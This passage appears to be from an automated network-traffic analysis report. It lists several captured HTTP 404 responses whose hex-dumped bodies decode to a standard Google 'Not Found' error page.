                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:19 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:22 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:31 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:33 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Tue, 29 Oct 2024 12:08:41 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 